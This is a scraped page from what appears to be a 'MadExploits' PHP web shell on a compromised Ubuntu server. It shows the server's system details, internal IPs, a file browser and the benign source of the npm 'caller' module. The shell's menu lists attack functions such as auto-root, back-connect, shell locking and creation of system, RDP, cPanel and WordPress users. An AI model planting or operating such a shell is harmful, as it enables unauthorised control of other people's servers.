Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
caller /
[ HOME SHELL ]
Name
Size
Permission
Action
CHANGELOG.md
108
B
-rw-rw-r--
LICENSE
1.05
KB
-rw-rw-r--
README.md
912
B
-rw-rw-r--
index.js
1.18
KB
-rw-rw-r--
package.json
583
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
'use strict'; var assert = require('assert'); /** * Module wrapper of @substack's `caller.js` * @original: https://github.com/substack/node-resolve/blob/master/lib/caller.js * @blessings: https://twitter.com/eriktoth/statuses/413719312273125377 * @see https://code.google.com/p/v8/wiki/JavaScriptStackTraceApi */ module.exports = function (depth) { var pst, stack, file, frame, startIdx; pst = Error.prepareStackTrace; Error.prepareStackTrace = function (_, stack) { Error.prepareStackTrace = pst; return stack; }; stack = (new Error()).stack; // Handle case where error object is wrapped by say babel. Try to find current file's index first. startIdx = 0; while(startIdx < stack.length && stack[startIdx].getFileName() !== __filename) startIdx++; assert(startIdx < stack.length, 'Unexpected: unable to find caller/index.js in the stack'); depth = !depth || isNaN(depth) ? 1 : (depth > stack.length - 2 ? stack.length - 2 : depth); stack = stack.slice(startIdx + depth + 1); do { frame = stack.shift(); file = frame && frame.getFileName(); } while (stack.length && file === 'module.js'); return file; };
Close